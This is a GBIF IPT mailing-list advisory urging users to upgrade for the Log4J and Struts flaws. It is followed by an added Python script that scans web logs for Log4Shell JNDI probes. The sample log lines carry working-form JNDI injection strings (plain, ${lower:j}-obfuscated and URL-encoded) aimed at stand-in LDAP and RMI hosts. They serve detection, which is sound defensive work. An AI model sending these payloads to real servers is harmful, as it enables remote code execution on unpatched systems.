Dear IPT users,
Yesterday, the developers of the Log4J library used by the IPT issued a
further security update, described at [1]. It is less severe than the
first problem, since it does not allow attackers to run their own code
on a hacked server.
The IPT does not use this part of Log4J, so we will not release a new
version of the IPT for this.
It's still important to upgrade to version 2.5.4, containing Log4J
version 2.15.0, as described in the email below.
Best regards,
Matthew
[1] https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/
On 11/12/2021 10:55, Matthew Blissett wrote:
Dear IPT users,
We have released a new version of the IPT, version 2.5.4 [1]. This
version contains fixes to critical security issues with the Struts and
Log4J[2] libraries.
According to the press [3], the problem with the Log4J library
vulnerability is being exploited by malicious users — and I can
already see queries containing "jndi" in the web server logs for the
IPTs GBIF hosts at cloud.gbif.org, although they are random attempts
and would not succeed.
All users are highly encouraged to upgrade to this version as soon as
possible.
As usual, upgrade and installation instructions are in the manual [1].
Please remember to check your data directory backup is working before
starting the upgrade.
[1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
[2] https://www.lunasec.io/docs/blog/log4j-zero-day/
[3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critical-vulnerability-log-4-shell
Best regards,
Matthew
_______________________________________________
IPT mailing list
[email protected]
https://lists.gbif.org/mailman/listinfo/ipt
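The quoted message mentions spotting queries containing "jndi" in the web server logs of the GBIF-hosted IPTs. The script below is an added example of that check, not code from the IPT project or from the mail above. It scans access-log lines for Log4Shell-style JNDI lookup strings, and it also undoes the common obfuscations seen in the wild (URL encoding, ${lower:j}, ${::-j}) that a plain grep for "jndi" would miss. The log lines, IP addresses and log format (combined format: client address first, request line in quotes, user agent last) are constructed for the example and are not real IPT traffic.

```python
"""Flag Log4Shell-style JNDI probes in web server access logs.

Added example with constructed data; not real IPT/GBIF logs. Assumes the
combined log format: client address first, request line in quotes, user
agent last.
"""
import re
from urllib.parse import unquote

# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
# Lines 2-4 carry a JNDI lookup in the query string, the user agent, and in
# URL-encoded form; lines 1 and 5 are ordinary requests.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Dec/2021:09:12:01 +0000] "GET /ipt/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [11/Dec/2021:09:13:44 +0000] "GET /ipt/resource?r=${jndi:ldap://198.51.100.23:1389/a} HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [11/Dec/2021:09:13:45 +0000] "GET /ipt/ HTTP/1.1" 200 5123 "-" "${${lower:j}ndi:ldap://198.51.100.23:1389/a}"
192.0.2.9 - - [11/Dec/2021:09:14:02 +0000] "GET /ipt/?x=%24%7Bjndi%3Armi%3A%2F%2F192.0.2.9%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/7.79"
192.0.2.10 - - [11/Dec/2021:09:15:00 +0000] "GET /ipt/manage/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# ${lower:x} / ${upper:x} nested inside the lookup to split the word "jndi".
_LOOKUP_CASE = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
# Default-value form: ${::-j} or ${env:DOESNOTEXIST:-j} evaluates to "j".
_LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The lookup we actually care about, once de-obfuscated.
_JNDI = re.compile(r"\$\{jndi:[^}]*\}?", re.IGNORECASE)
_CLIENT_IP = re.compile(r"^(\S+)")


def normalize(s, max_rounds=10):
    """Undo URL encoding and nested lookups so that %24%7Bjndi... and
    ${${lower:j}ndi:...} both collapse to plain ${jndi:...}.

    Runs until the string stops changing, so double encoding and several
    layers of nesting are handled; max_rounds bounds pathological input."""
    for _ in range(max_rounds):
        before = s
        s = unquote(s)
        s = _LOOKUP_CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(),
            s,
        )
        s = _LOOKUP_DEFAULT.sub(r"\1", s)
        if s == before:
            break
    return s


def find_jndi_probes(log_text):
    """Return one record per log line carrying a JNDI lookup anywhere in
    the line (request path, query string, referer or user agent)."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        match = _JNDI.search(normalize(line))
        if match:
            hits.append({
                "line": lineno,
                "client": _CLIENT_IP.match(line).group(1),
                "lookup": match.group(0),
            })
    return hits


if __name__ == "__main__":
    for hit in find_jndi_probes(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} sent {hit['lookup']}")
```

A hit only means a probe reached the server, which is exactly what the mail describes; it says nothing about whether the lookup was ever evaluated. On a patched IPT (2.5.4 with Log4J 2.15.0) or one where the logged field is never passed to Log4J, such lines are noise to be tracked, not evidence of compromise.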